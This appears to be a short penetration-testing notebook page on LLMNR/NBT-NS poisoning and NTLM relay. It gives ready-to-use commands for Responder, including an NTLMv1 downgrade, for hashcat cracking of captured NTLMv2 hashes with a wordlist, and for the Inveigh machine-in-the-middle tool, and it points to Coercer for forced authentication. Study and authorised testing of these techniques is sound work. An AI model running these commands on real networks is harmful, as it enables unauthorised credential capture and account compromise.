LLMNR NBT-NS Poisoning

Responder

sudo responder -I ens224 

hashcat -m 5600 forend_ntlmv2 /usr/share/wordlists/rockyou.txt 

Hashes

Downgrade Attack

Responder.py -I eth0 -v --lm --disable-ess

NTLMv1 DowngradePentester's Promiscuous Notebook

NetNTLMv1 obtained - Convert the hash to NTLM - See Crack Hash

Inveigh

GitHub - Kevin-Robertson/Inveigh: .NET IPv4/IPv6 machine-in-the-middle tool for penetration testersGitHub

PS C:\htb> Import-Module .\Inveigh.ps1

PS C:\htb> Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y

Invoke-Inveigh -IP '10.13.38.16' –NBNS Y –mDNS Y –Proxy Y -FileOutput Y -FileOutputDirectory 'c:\users\username\documents' -LogOutput Y

Basics · Kevin-Robertson/Inveigh WikiGitHub

C# version

PS C:\htb> .\Inveigh.exe

Press ESC to enter/exit interactive console

GET NTLMV2UNIQUE

GET NTLMV2USERNAMES

NTLM Relay

SMB (445, 139) / RPC

Relai NTLMhackndo

Coercer

GitHub - p0dalirius/Coercer: A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through 9 methods.GitHub

More Tools: SMB